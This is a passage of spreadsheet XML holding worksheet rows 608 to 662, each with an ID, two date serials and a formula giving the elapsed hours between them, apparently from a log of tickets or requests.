    <row r="608" spans="1:8" hidden="1">
      <c r="A608" t="s">
        <v>2120</v>
      </c>
      <c r="B608">
        <v>13202</v>
      </c>
      <c r="C608" t="s">
        <v>2121</v>
      </c>
      <c r="D608" t="s">
        <v>7</v>
      </c>
      <c r="E608" s="1">
        <v>43552.311921296299</v>
      </c>
      <c r="F608" s="1">
        <v>43564.06958333333</v>
      </c>
      <c r="G608" t="s">
        <v>2122</v>
      </c>
      <c r="H608" t="str">
        <f>TEXT(F608-E608,"[h]")</f>
        <v>282</v>
      </c>
    </row>
    <row r="609" spans="1:8">
      <c r="A609" t="s">
        <v>2123</v>
      </c>
      <c r="B609">
        <v>13200</v>
      </c>
      <c r="C609" t="s">
        <v>2124</v>
      </c>
      <c r="D609" t="s">
        <v>7</v>
      </c>
      <c r="E609" s="1">
        <v>43551.908402777779</v>
      </c>
      <c r="F609" s="1">
        <v>43570.746168981481</v>
      </c>
      <c r="G609" t="s">
        <v>31</v>
      </c>
      <c r="H609" t="str">
        <f>TEXT(F609-E609,"[h]")</f>
        <v>452</v>
      </c>
    </row>
    <row r="610" spans="1:8" hidden="1">
      <c r="A610" t="s">
        <v>2125</v>
      </c>
      <c r="B610">
        <v>13196</v>
      </c>
      <c r="C610" t="s">
        <v>2126</v>
      </c>
      <c r="D610" t="s">
        <v>7</v>
      </c>
      <c r="E610" s="1">
        <v>43550.81521990741</v>
      </c>
      <c r="F610" s="1">
        <v>43551.565150462964</v>
      </c>
      <c r="G610" t="s">
        <v>66</v>
      </c>
      <c r="H610" t="str">
        <f>TEXT(F610-E610,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="611" spans="1:8" hidden="1">
      <c r="A611" t="s">
        <v>2127</v>
      </c>
      <c r="B611">
        <v>13193</v>
      </c>
      <c r="C611" t="s">
        <v>2128</v>
      </c>
      <c r="D611" t="s">
        <v>7</v>
      </c>
      <c r="E611" s="1">
        <v>43550.601099537038</v>
      </c>
      <c r="F611" s="1">
        <v>43579.785254629627</v>
      </c>
      <c r="G611" t="s">
        <v>258</v>
      </c>
      <c r="H611" t="str">
        <f>TEXT(F611-E611,"[h]")</f>
        <v>700</v>
      </c>
    </row>
    <row r="612" spans="1:8" hidden="1">
      <c r="A612" t="s">
        <v>2129</v>
      </c>
      <c r="B612">
        <v>13191</v>
      </c>
      <c r="C612" t="s">
        <v>2130</v>
      </c>
      <c r="D612" t="s">
        <v>7</v>
      </c>
      <c r="E612" s="1">
        <v>43550.534710648149</v>
      </c>
      <c r="F612" s="1">
        <v>43606.931840277779</v>
      </c>
      <c r="G612" t="s">
        <v>138</v>
      </c>
      <c r="H612" t="str">
        <f>TEXT(F612-E612,"[h]")</f>
        <v>1353</v>
      </c>
    </row>
    <row r="613" spans="1:8" hidden="1">
      <c r="A613" t="s">
        <v>2131</v>
      </c>
      <c r="B613">
        <v>13188</v>
      </c>
      <c r="C613" t="s">
        <v>2132</v>
      </c>
      <c r="D613" t="s">
        <v>7</v>
      </c>
      <c r="E613" s="1">
        <v>43550.315428240741</v>
      </c>
      <c r="F613" s="1">
        <v>43553.905115740738</v>
      </c>
      <c r="G613" t="s">
        <v>2133</v>
      </c>
      <c r="H613" t="str">
        <f>TEXT(F613-E613,"[h]")</f>
        <v>86</v>
      </c>
    </row>
    <row r="614" spans="1:8" hidden="1">
      <c r="A614" t="s">
        <v>2134</v>
      </c>
      <c r="B614">
        <v>13184</v>
      </c>
      <c r="C614" t="s">
        <v>2135</v>
      </c>
      <c r="D614" t="s">
        <v>7</v>
      </c>
      <c r="E614" s="1">
        <v>43549.641365740739</v>
      </c>
      <c r="F614" s="1">
        <v>43606.968240740738</v>
      </c>
      <c r="G614" t="s">
        <v>2136</v>
      </c>
      <c r="H614" t="str">
        <f>TEXT(F614-E614,"[h]")</f>
        <v>1375</v>
      </c>
    </row>
    <row r="615" spans="1:8" hidden="1">
      <c r="A615" t="s">
        <v>2137</v>
      </c>
      <c r="B615">
        <v>13182</v>
      </c>
      <c r="C615" t="s">
        <v>2138</v>
      </c>
      <c r="D615" t="s">
        <v>7</v>
      </c>
      <c r="E615" s="1">
        <v>43547.992245370369</v>
      </c>
      <c r="F615" s="1">
        <v>43551.562557870369</v>
      </c>
      <c r="G615" t="s">
        <v>28</v>
      </c>
      <c r="H615" t="str">
        <f>TEXT(F615-E615,"[h]")</f>
        <v>85</v>
      </c>
    </row>
    <row r="616" spans="1:8">
      <c r="A616" t="s">
        <v>2139</v>
      </c>
      <c r="B616">
        <v>13181</v>
      </c>
      <c r="C616" t="s">
        <v>2140</v>
      </c>
      <c r="D616" t="s">
        <v>7</v>
      </c>
      <c r="E616" s="1">
        <v>43547.971250000002</v>
      </c>
      <c r="F616" s="1">
        <v>43549.25744212963</v>
      </c>
      <c r="G616" t="s">
        <v>2141</v>
      </c>
      <c r="H616" t="str">
        <f>TEXT(F616-E616,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="617" spans="1:8">
      <c r="A617" t="s">
        <v>2142</v>
      </c>
      <c r="B617">
        <v>13177</v>
      </c>
      <c r="C617" t="s">
        <v>2143</v>
      </c>
      <c r="D617" t="s">
        <v>7</v>
      </c>
      <c r="E617" s="1">
        <v>43546.517291666663</v>
      </c>
      <c r="F617" s="1">
        <v>43556.575810185182</v>
      </c>
      <c r="G617" t="s">
        <v>16</v>
      </c>
      <c r="H617" t="str">
        <f>TEXT(F617-E617,"[h]")</f>
        <v>241</v>
      </c>
    </row>
    <row r="618" spans="1:8">
      <c r="A618" t="s">
        <v>2144</v>
      </c>
      <c r="B618">
        <v>13176</v>
      </c>
      <c r="C618" t="s">
        <v>2145</v>
      </c>
      <c r="D618" t="s">
        <v>7</v>
      </c>
      <c r="E618" s="1">
        <v>43545.809930555559</v>
      </c>
      <c r="F618" s="1">
        <v>43557.210648148146</v>
      </c>
      <c r="G618" t="s">
        <v>16</v>
      </c>
      <c r="H618" t="str">
        <f>TEXT(F618-E618,"[h]")</f>
        <v>273</v>
      </c>
    </row>
    <row r="619" spans="1:8" hidden="1">
      <c r="A619" t="s">
        <v>2146</v>
      </c>
      <c r="B619">
        <v>13175</v>
      </c>
      <c r="C619" t="s">
        <v>2147</v>
      </c>
      <c r="D619" t="s">
        <v>7</v>
      </c>
      <c r="E619" s="1">
        <v>43545.720763888887</v>
      </c>
      <c r="F619" s="1">
        <v>43623.337013888886</v>
      </c>
      <c r="G619" t="s">
        <v>445</v>
      </c>
      <c r="H619" t="str">
        <f>TEXT(F619-E619,"[h]")</f>
        <v>1862</v>
      </c>
    </row>
    <row r="620" spans="1:8" hidden="1">
      <c r="A620" t="s">
        <v>2148</v>
      </c>
      <c r="B620">
        <v>13174</v>
      </c>
      <c r="C620" t="s">
        <v>2149</v>
      </c>
      <c r="D620" t="s">
        <v>7</v>
      </c>
      <c r="E620" s="1">
        <v>43545.636643518519</v>
      </c>
      <c r="F620" s="1">
        <v>43548.252349537041</v>
      </c>
      <c r="G620" t="s">
        <v>51</v>
      </c>
      <c r="H620" t="str">
        <f>TEXT(F620-E620,"[h]")</f>
        <v>62</v>
      </c>
    </row>
    <row r="621" spans="1:8" hidden="1">
      <c r="A621" t="s">
        <v>2150</v>
      </c>
      <c r="B621">
        <v>13170</v>
      </c>
      <c r="C621" t="s">
        <v>2151</v>
      </c>
      <c r="D621" t="s">
        <v>7</v>
      </c>
      <c r="E621" s="1">
        <v>43545.50445601852</v>
      </c>
      <c r="F621" s="1">
        <v>43545.710277777776</v>
      </c>
      <c r="G621" t="s">
        <v>2152</v>
      </c>
      <c r="H621" t="str">
        <f>TEXT(F621-E621,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="622" spans="1:8" hidden="1">
      <c r="A622" t="s">
        <v>2153</v>
      </c>
      <c r="B622">
        <v>13169</v>
      </c>
      <c r="C622" t="s">
        <v>2154</v>
      </c>
      <c r="D622" t="s">
        <v>7</v>
      </c>
      <c r="E622" s="1">
        <v>43545.291446759256</v>
      </c>
      <c r="F622" s="1">
        <v>43545.580011574071</v>
      </c>
      <c r="G622" t="s">
        <v>174</v>
      </c>
      <c r="H622" t="str">
        <f>TEXT(F622-E622,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="623" spans="1:8">
      <c r="A623" t="s">
        <v>2155</v>
      </c>
      <c r="B623">
        <v>13168</v>
      </c>
      <c r="C623" t="s">
        <v>2156</v>
      </c>
      <c r="D623" t="s">
        <v>7</v>
      </c>
      <c r="E623" s="1">
        <v>43544.935208333336</v>
      </c>
      <c r="F623" s="1">
        <v>43553.906099537038</v>
      </c>
      <c r="G623" t="s">
        <v>849</v>
      </c>
      <c r="H623" t="str">
        <f>TEXT(F623-E623,"[h]")</f>
        <v>215</v>
      </c>
    </row>
    <row r="624" spans="1:8">
      <c r="A624" t="s">
        <v>2157</v>
      </c>
      <c r="B624">
        <v>13165</v>
      </c>
      <c r="C624" t="s">
        <v>2158</v>
      </c>
      <c r="D624" t="s">
        <v>7</v>
      </c>
      <c r="E624" s="1">
        <v>43544.66033564815</v>
      </c>
      <c r="F624" s="1">
        <v>43557.210636574076</v>
      </c>
      <c r="G624" t="s">
        <v>16</v>
      </c>
      <c r="H624" t="str">
        <f>TEXT(F624-E624,"[h]")</f>
        <v>301</v>
      </c>
    </row>
    <row r="625" spans="1:8" hidden="1">
      <c r="A625" t="s">
        <v>2159</v>
      </c>
      <c r="B625">
        <v>13163</v>
      </c>
      <c r="C625" t="s">
        <v>2160</v>
      </c>
      <c r="D625" t="s">
        <v>7</v>
      </c>
      <c r="E625" s="1">
        <v>43544.587731481479</v>
      </c>
      <c r="F625" s="1">
        <v>43613.714745370373</v>
      </c>
      <c r="G625" t="s">
        <v>222</v>
      </c>
      <c r="H625" t="str">
        <f>TEXT(F625-E625,"[h]")</f>
        <v>1659</v>
      </c>
    </row>
    <row r="626" spans="1:8" hidden="1">
      <c r="A626" t="s">
        <v>2161</v>
      </c>
      <c r="B626">
        <v>13162</v>
      </c>
      <c r="C626" t="s">
        <v>2162</v>
      </c>
      <c r="D626" t="s">
        <v>7</v>
      </c>
      <c r="E626" s="1">
        <v>43544.50980324074</v>
      </c>
      <c r="F626" s="1">
        <v>43544.66611111111</v>
      </c>
      <c r="G626" t="s">
        <v>1520</v>
      </c>
      <c r="H626" t="str">
        <f>TEXT(F626-E626,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="627" spans="1:8" hidden="1">
      <c r="A627" t="s">
        <v>2163</v>
      </c>
      <c r="B627">
        <v>13161</v>
      </c>
      <c r="C627" t="s">
        <v>2164</v>
      </c>
      <c r="D627" t="s">
        <v>7</v>
      </c>
      <c r="E627" s="1">
        <v>43544.432858796295</v>
      </c>
      <c r="F627" s="1">
        <v>43565.330011574071</v>
      </c>
      <c r="G627" t="s">
        <v>2165</v>
      </c>
      <c r="H627" t="str">
        <f>TEXT(F627-E627,"[h]")</f>
        <v>501</v>
      </c>
    </row>
    <row r="628" spans="1:8">
      <c r="A628" t="s">
        <v>2166</v>
      </c>
      <c r="B628">
        <v>13159</v>
      </c>
      <c r="C628" t="s">
        <v>2167</v>
      </c>
      <c r="D628" t="s">
        <v>7</v>
      </c>
      <c r="E628" s="1">
        <v>43543.992569444446</v>
      </c>
      <c r="F628" s="1">
        <v>43614.799513888887</v>
      </c>
      <c r="G628" t="s">
        <v>123</v>
      </c>
      <c r="H628" t="str">
        <f>TEXT(F628-E628,"[h]")</f>
        <v>1699</v>
      </c>
    </row>
    <row r="629" spans="1:8" hidden="1">
      <c r="A629" t="s">
        <v>2168</v>
      </c>
      <c r="B629">
        <v>13158</v>
      </c>
      <c r="C629" t="s">
        <v>2169</v>
      </c>
      <c r="D629" t="s">
        <v>7</v>
      </c>
      <c r="E629" s="1">
        <v>43543.411620370367</v>
      </c>
      <c r="F629" s="1">
        <v>43608.970104166663</v>
      </c>
      <c r="G629" t="s">
        <v>510</v>
      </c>
      <c r="H629" t="str">
        <f>TEXT(F629-E629,"[h]")</f>
        <v>1573</v>
      </c>
    </row>
    <row r="630" spans="1:8" hidden="1">
      <c r="A630" t="s">
        <v>2170</v>
      </c>
      <c r="B630">
        <v>13157</v>
      </c>
      <c r="C630" t="s">
        <v>2171</v>
      </c>
      <c r="D630" t="s">
        <v>7</v>
      </c>
      <c r="E630" s="1">
        <v>43543.338842592595</v>
      </c>
      <c r="F630" s="1">
        <v>43585.883125</v>
      </c>
      <c r="G630" t="s">
        <v>60</v>
      </c>
      <c r="H630" t="str">
        <f>TEXT(F630-E630,"[h]")</f>
        <v>1021</v>
      </c>
    </row>
    <row r="631" spans="1:8" hidden="1">
      <c r="A631" t="s">
        <v>2172</v>
      </c>
      <c r="B631">
        <v>13149</v>
      </c>
      <c r="C631" t="s">
        <v>2173</v>
      </c>
      <c r="D631" t="s">
        <v>7</v>
      </c>
      <c r="E631" s="1">
        <v>43541.880891203706</v>
      </c>
      <c r="F631" s="1">
        <v>43549.808182870373</v>
      </c>
      <c r="G631" t="s">
        <v>75</v>
      </c>
      <c r="H631" t="str">
        <f>TEXT(F631-E631,"[h]")</f>
        <v>190</v>
      </c>
    </row>
    <row r="632" spans="1:8" hidden="1">
      <c r="A632" t="s">
        <v>2174</v>
      </c>
      <c r="B632">
        <v>13147</v>
      </c>
      <c r="C632" t="s">
        <v>2175</v>
      </c>
      <c r="D632" t="s">
        <v>7</v>
      </c>
      <c r="E632" s="1">
        <v>43541.356585648151</v>
      </c>
      <c r="F632" s="1">
        <v>43543.343449074076</v>
      </c>
      <c r="G632" t="s">
        <v>657</v>
      </c>
      <c r="H632" t="str">
        <f>TEXT(F632-E632,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="633" spans="1:8" hidden="1">
      <c r="A633" t="s">
        <v>2176</v>
      </c>
      <c r="B633">
        <v>13146</v>
      </c>
      <c r="C633" t="s">
        <v>2177</v>
      </c>
      <c r="D633" t="s">
        <v>7</v>
      </c>
      <c r="E633" s="1">
        <v>43541.154918981483</v>
      </c>
      <c r="F633" s="1">
        <v>43541.812048611115</v>
      </c>
      <c r="G633" t="s">
        <v>1205</v>
      </c>
      <c r="H633" t="str">
        <f>TEXT(F633-E633,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="634" spans="1:8">
      <c r="A634" t="s">
        <v>2180</v>
      </c>
      <c r="B634">
        <v>13144</v>
      </c>
      <c r="C634" t="s">
        <v>2181</v>
      </c>
      <c r="D634" t="s">
        <v>7</v>
      </c>
      <c r="E634" s="1">
        <v>43540.948333333334</v>
      </c>
      <c r="F634" s="1">
        <v>43541.040335648147</v>
      </c>
      <c r="G634" t="s">
        <v>2182</v>
      </c>
      <c r="H634" t="str">
        <f>TEXT(F634-E634,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="635" spans="1:8">
      <c r="A635" t="s">
        <v>2183</v>
      </c>
      <c r="B635">
        <v>13143</v>
      </c>
      <c r="C635" t="s">
        <v>2184</v>
      </c>
      <c r="D635" t="s">
        <v>7</v>
      </c>
      <c r="E635" s="1">
        <v>43540.944652777776</v>
      </c>
      <c r="F635" s="1">
        <v>43541.019432870373</v>
      </c>
      <c r="G635" t="s">
        <v>98</v>
      </c>
      <c r="H635" t="str">
        <f>TEXT(F635-E635,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="636" spans="1:8">
      <c r="A636" t="s">
        <v>2185</v>
      </c>
      <c r="B636">
        <v>13142</v>
      </c>
      <c r="C636" t="s">
        <v>2186</v>
      </c>
      <c r="D636" t="s">
        <v>7</v>
      </c>
      <c r="E636" s="1">
        <v>43540.941979166666</v>
      </c>
      <c r="F636" s="1">
        <v>43541.003923611112</v>
      </c>
      <c r="G636" t="s">
        <v>2187</v>
      </c>
      <c r="H636" t="str">
        <f>TEXT(F636-E636,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="637" spans="1:8" hidden="1">
      <c r="A637" t="s">
        <v>2191</v>
      </c>
      <c r="B637">
        <v>13140</v>
      </c>
      <c r="C637" t="s">
        <v>2192</v>
      </c>
      <c r="D637" t="s">
        <v>7</v>
      </c>
      <c r="E637" s="1">
        <v>43540.825138888889</v>
      </c>
      <c r="F637" s="1">
        <v>43541.876018518517</v>
      </c>
      <c r="G637" t="s">
        <v>2193</v>
      </c>
      <c r="H637" t="str">
        <f>TEXT(F637-E637,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="638" spans="1:8" hidden="1">
      <c r="A638" t="s">
        <v>2194</v>
      </c>
      <c r="B638">
        <v>13139</v>
      </c>
      <c r="C638" t="s">
        <v>2195</v>
      </c>
      <c r="D638" t="s">
        <v>7</v>
      </c>
      <c r="E638" s="1">
        <v>43540.632685185185</v>
      </c>
      <c r="F638" s="1">
        <v>43540.635844907411</v>
      </c>
      <c r="G638" t="s">
        <v>251</v>
      </c>
      <c r="H638" t="str">
        <f>TEXT(F638-E638,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="639" spans="1:8">
      <c r="A639" t="s">
        <v>2196</v>
      </c>
      <c r="B639">
        <v>13137</v>
      </c>
      <c r="C639" t="s">
        <v>2197</v>
      </c>
      <c r="D639" t="s">
        <v>7</v>
      </c>
      <c r="E639" s="1">
        <v>43540.491354166668</v>
      </c>
      <c r="F639" s="1">
        <v>43540.81177083333</v>
      </c>
      <c r="G639" t="s">
        <v>160</v>
      </c>
      <c r="H639" t="str">
        <f>TEXT(F639-E639,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="640" spans="1:8" hidden="1">
      <c r="A640" t="s">
        <v>2198</v>
      </c>
      <c r="B640">
        <v>13136</v>
      </c>
      <c r="C640" t="s">
        <v>2199</v>
      </c>
      <c r="D640" t="s">
        <v>7</v>
      </c>
      <c r="E640" s="1">
        <v>43539.987615740742</v>
      </c>
      <c r="F640" s="1">
        <v>43582.026643518519</v>
      </c>
      <c r="G640" t="s">
        <v>2200</v>
      </c>
      <c r="H640" t="str">
        <f>TEXT(F640-E640,"[h]")</f>
        <v>1008</v>
      </c>
    </row>
    <row r="641" spans="1:8" hidden="1">
      <c r="A641" t="s">
        <v>2201</v>
      </c>
      <c r="B641">
        <v>13135</v>
      </c>
      <c r="C641" t="s">
        <v>2202</v>
      </c>
      <c r="D641" t="s">
        <v>7</v>
      </c>
      <c r="E641" s="1">
        <v>43539.916724537034</v>
      </c>
      <c r="F641" s="1">
        <v>43539.926238425927</v>
      </c>
      <c r="G641" t="s">
        <v>304</v>
      </c>
      <c r="H641" t="str">
        <f>TEXT(F641-E641,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="642" spans="1:8" hidden="1">
      <c r="A642" t="s">
        <v>2203</v>
      </c>
      <c r="B642">
        <v>13134</v>
      </c>
      <c r="C642" t="s">
        <v>2204</v>
      </c>
      <c r="D642" t="s">
        <v>7</v>
      </c>
      <c r="E642" s="1">
        <v>43539.712118055555</v>
      </c>
      <c r="F642" s="1">
        <v>43575.722754629627</v>
      </c>
      <c r="G642" t="s">
        <v>37</v>
      </c>
      <c r="H642" t="str">
        <f>TEXT(F642-E642,"[h]")</f>
        <v>864</v>
      </c>
    </row>
    <row r="643" spans="1:8" hidden="1">
      <c r="A643" t="s">
        <v>2205</v>
      </c>
      <c r="B643">
        <v>13132</v>
      </c>
      <c r="C643" t="s">
        <v>2206</v>
      </c>
      <c r="D643" t="s">
        <v>7</v>
      </c>
      <c r="E643" s="1">
        <v>43539.572002314817</v>
      </c>
      <c r="F643" s="1">
        <v>43586.551458333335</v>
      </c>
      <c r="G643" t="s">
        <v>2207</v>
      </c>
      <c r="H643" t="str">
        <f>TEXT(F643-E643,"[h]")</f>
        <v>1127</v>
      </c>
    </row>
    <row r="644" spans="1:8" hidden="1">
      <c r="A644" t="s">
        <v>2208</v>
      </c>
      <c r="B644">
        <v>13131</v>
      </c>
      <c r="C644" t="s">
        <v>2209</v>
      </c>
      <c r="D644" t="s">
        <v>7</v>
      </c>
      <c r="E644" s="1">
        <v>43539.344895833332</v>
      </c>
      <c r="F644" s="1">
        <v>43539.681886574072</v>
      </c>
      <c r="G644" t="s">
        <v>2152</v>
      </c>
      <c r="H644" t="str">
        <f>TEXT(F644-E644,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="645" spans="1:8" hidden="1">
      <c r="A645" t="s">
        <v>2210</v>
      </c>
      <c r="B645">
        <v>13130</v>
      </c>
      <c r="C645" t="s">
        <v>2211</v>
      </c>
      <c r="D645" t="s">
        <v>7</v>
      </c>
      <c r="E645" s="1">
        <v>43539.247291666667</v>
      </c>
      <c r="F645" s="1">
        <v>43540.623506944445</v>
      </c>
      <c r="G645" t="s">
        <v>1205</v>
      </c>
      <c r="H645" t="str">
        <f>TEXT(F645-E645,"[h]")</f>
        <v>33</v>
      </c>
    </row>
    <row r="646" spans="1:8" hidden="1">
      <c r="A646" t="s">
        <v>2110</v>
      </c>
      <c r="B646">
        <v>13129</v>
      </c>
      <c r="C646" t="s">
        <v>2111</v>
      </c>
      <c r="D646" t="s">
        <v>7</v>
      </c>
      <c r="E646" s="1">
        <v>43539.226354166669</v>
      </c>
      <c r="F646" s="1">
        <v>43626.931250000001</v>
      </c>
      <c r="G646" t="s">
        <v>51</v>
      </c>
      <c r="H646" t="str">
        <f>TEXT(F646-E646,"[h]")</f>
        <v>2104</v>
      </c>
    </row>
    <row r="647" spans="1:8" hidden="1">
      <c r="A647" t="s">
        <v>2212</v>
      </c>
      <c r="B647">
        <v>13128</v>
      </c>
      <c r="C647" t="s">
        <v>2213</v>
      </c>
      <c r="D647" t="s">
        <v>7</v>
      </c>
      <c r="E647" s="1">
        <v>43539.20108796296</v>
      </c>
      <c r="F647" s="1">
        <v>43539.802870370368</v>
      </c>
      <c r="G647" t="s">
        <v>1205</v>
      </c>
      <c r="H647" t="str">
        <f>TEXT(F647-E647,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="648" spans="1:8" hidden="1">
      <c r="A648" t="s">
        <v>2214</v>
      </c>
      <c r="B648">
        <v>13127</v>
      </c>
      <c r="C648" t="s">
        <v>2215</v>
      </c>
      <c r="D648" t="s">
        <v>7</v>
      </c>
      <c r="E648" s="1">
        <v>43539.174340277779</v>
      </c>
      <c r="F648" s="1">
        <v>43539.253877314812</v>
      </c>
      <c r="G648" t="s">
        <v>157</v>
      </c>
      <c r="H648" t="str">
        <f>TEXT(F648-E648,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="649" spans="1:8" hidden="1">
      <c r="A649" t="s">
        <v>2216</v>
      </c>
      <c r="B649">
        <v>13126</v>
      </c>
      <c r="C649" t="s">
        <v>2217</v>
      </c>
      <c r="D649" t="s">
        <v>7</v>
      </c>
      <c r="E649" s="1">
        <v>43539.1718287037</v>
      </c>
      <c r="F649" s="1">
        <v>43540.805543981478</v>
      </c>
      <c r="G649" t="s">
        <v>2218</v>
      </c>
      <c r="H649" t="str">
        <f>TEXT(F649-E649,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="650" spans="1:8">
      <c r="A650" t="s">
        <v>2219</v>
      </c>
      <c r="B650">
        <v>13125</v>
      </c>
      <c r="C650" t="s">
        <v>2220</v>
      </c>
      <c r="D650" t="s">
        <v>7</v>
      </c>
      <c r="E650" s="1">
        <v>43538.995138888888</v>
      </c>
      <c r="F650" s="1">
        <v>43539.253101851849</v>
      </c>
      <c r="G650" t="s">
        <v>126</v>
      </c>
      <c r="H650" t="str">
        <f>TEXT(F650-E650,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="651" spans="1:8" hidden="1">
      <c r="A651" t="s">
        <v>2221</v>
      </c>
      <c r="B651">
        <v>13124</v>
      </c>
      <c r="C651" t="s">
        <v>2222</v>
      </c>
      <c r="D651" t="s">
        <v>7</v>
      </c>
      <c r="E651" s="1">
        <v>43538.769907407404</v>
      </c>
      <c r="F651" s="1">
        <v>43540.767060185186</v>
      </c>
      <c r="G651" t="s">
        <v>222</v>
      </c>
      <c r="H651" t="str">
        <f>TEXT(F651-E651,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="652" spans="1:8" hidden="1">
      <c r="A652" t="s">
        <v>2223</v>
      </c>
      <c r="B652">
        <v>13119</v>
      </c>
      <c r="C652" t="s">
        <v>2224</v>
      </c>
      <c r="D652" t="s">
        <v>7</v>
      </c>
      <c r="E652" s="1">
        <v>43538.485196759262</v>
      </c>
      <c r="F652" s="1">
        <v>43544.527824074074</v>
      </c>
      <c r="G652" t="s">
        <v>51</v>
      </c>
      <c r="H652" t="str">
        <f>TEXT(F652-E652,"[h]")</f>
        <v>145</v>
      </c>
    </row>
    <row r="653" spans="1:8" hidden="1">
      <c r="A653" t="s">
        <v>2225</v>
      </c>
      <c r="B653">
        <v>13118</v>
      </c>
      <c r="C653" t="s">
        <v>2226</v>
      </c>
      <c r="D653" t="s">
        <v>7</v>
      </c>
      <c r="E653" s="1">
        <v>43538.401944444442</v>
      </c>
      <c r="F653" s="1">
        <v>43538.6872337963</v>
      </c>
      <c r="G653" t="s">
        <v>1520</v>
      </c>
      <c r="H653" t="str">
        <f>TEXT(F653-E653,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="654" spans="1:8" hidden="1">
      <c r="A654" t="s">
        <v>2227</v>
      </c>
      <c r="B654">
        <v>13117</v>
      </c>
      <c r="C654" t="s">
        <v>2228</v>
      </c>
      <c r="D654" t="s">
        <v>7</v>
      </c>
      <c r="E654" s="1">
        <v>43537.98773148148</v>
      </c>
      <c r="F654" s="1">
        <v>43543.331122685187</v>
      </c>
      <c r="G654" t="s">
        <v>75</v>
      </c>
      <c r="H654" t="str">
        <f>TEXT(F654-E654,"[h]")</f>
        <v>128</v>
      </c>
    </row>
    <row r="655" spans="1:8" hidden="1">
      <c r="A655" t="s">
        <v>2229</v>
      </c>
      <c r="B655">
        <v>13116</v>
      </c>
      <c r="C655" t="s">
        <v>2230</v>
      </c>
      <c r="D655" t="s">
        <v>7</v>
      </c>
      <c r="E655" s="1">
        <v>43537.971863425926</v>
      </c>
      <c r="F655" s="1">
        <v>43542.592650462961</v>
      </c>
      <c r="G655" t="s">
        <v>1762</v>
      </c>
      <c r="H655" t="str">
        <f>TEXT(F655-E655,"[h]")</f>
        <v>110</v>
      </c>
    </row>
    <row r="656" spans="1:8" hidden="1">
      <c r="A656" t="s">
        <v>2231</v>
      </c>
      <c r="B656">
        <v>13115</v>
      </c>
      <c r="C656" t="s">
        <v>2232</v>
      </c>
      <c r="D656" t="s">
        <v>7</v>
      </c>
      <c r="E656" s="1">
        <v>43537.952939814815</v>
      </c>
      <c r="F656" s="1">
        <v>43540.718124999999</v>
      </c>
      <c r="G656" t="s">
        <v>809</v>
      </c>
      <c r="H656" t="str">
        <f>TEXT(F656-E656,"[h]")</f>
        <v>66</v>
      </c>
    </row>
    <row r="657" spans="1:8">
      <c r="A657" t="s">
        <v>2233</v>
      </c>
      <c r="B657">
        <v>13112</v>
      </c>
      <c r="C657" t="s">
        <v>2234</v>
      </c>
      <c r="D657" t="s">
        <v>7</v>
      </c>
      <c r="E657" s="1">
        <v>43537.715266203704</v>
      </c>
      <c r="F657" s="1">
        <v>43658.62672453704</v>
      </c>
      <c r="G657" t="s">
        <v>2235</v>
      </c>
      <c r="H657" t="str">
        <f>TEXT(F657-E657,"[h]")</f>
        <v>2901</v>
      </c>
    </row>
    <row r="658" spans="1:8" hidden="1">
      <c r="A658" t="s">
        <v>2236</v>
      </c>
      <c r="B658">
        <v>13111</v>
      </c>
      <c r="C658" t="s">
        <v>2237</v>
      </c>
      <c r="D658" t="s">
        <v>7</v>
      </c>
      <c r="E658" s="1">
        <v>43537.247245370374</v>
      </c>
      <c r="F658" s="1">
        <v>43537.785034722219</v>
      </c>
      <c r="G658" t="s">
        <v>1205</v>
      </c>
      <c r="H658" t="str">
        <f>TEXT(F658-E658,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="659" spans="1:8">
      <c r="A659" t="s">
        <v>2238</v>
      </c>
      <c r="B659">
        <v>13110</v>
      </c>
      <c r="C659" t="s">
        <v>2239</v>
      </c>
      <c r="D659" t="s">
        <v>7</v>
      </c>
      <c r="E659" s="1">
        <v>43536.777685185189</v>
      </c>
      <c r="F659" s="1">
        <v>43693.232858796298</v>
      </c>
      <c r="G659" t="s">
        <v>376</v>
      </c>
      <c r="H659" t="str">
        <f>TEXT(F659-E659,"[h]")</f>
        <v>3754</v>
      </c>
    </row>
    <row r="660" spans="1:8" hidden="1">
      <c r="A660" t="s">
        <v>2240</v>
      </c>
      <c r="B660">
        <v>13109</v>
      </c>
      <c r="C660" t="s">
        <v>2241</v>
      </c>
      <c r="D660" t="s">
        <v>7</v>
      </c>
      <c r="E660" s="1">
        <v>43536.699965277781</v>
      </c>
      <c r="F660" s="1">
        <v>43537.888344907406</v>
      </c>
      <c r="G660" t="s">
        <v>28</v>
      </c>
      <c r="H660" t="str">
        <f>TEXT(F660-E660,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="661" spans="1:8" hidden="1">
      <c r="A661" t="s">
        <v>2242</v>
      </c>
      <c r="B661">
        <v>13108</v>
      </c>
      <c r="C661" t="s">
        <v>2243</v>
      </c>
      <c r="D661" t="s">
        <v>7</v>
      </c>
      <c r="E661" s="1">
        <v>43536.286956018521</v>
      </c>
      <c r="F661" s="1">
        <v>43537.026875000003</v>
      </c>
      <c r="G661" t="s">
        <v>1205</v>
      </c>
      <c r="H661" t="str">
        <f>TEXT(F661-E661,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="662" spans="1:8" hidden="1">
      <c r="A662" t="s">
        <v>2244</v>
      </c>
      <c r="B662">
        <v>13107</v>
      </c>
      <c r="C662" t="s">
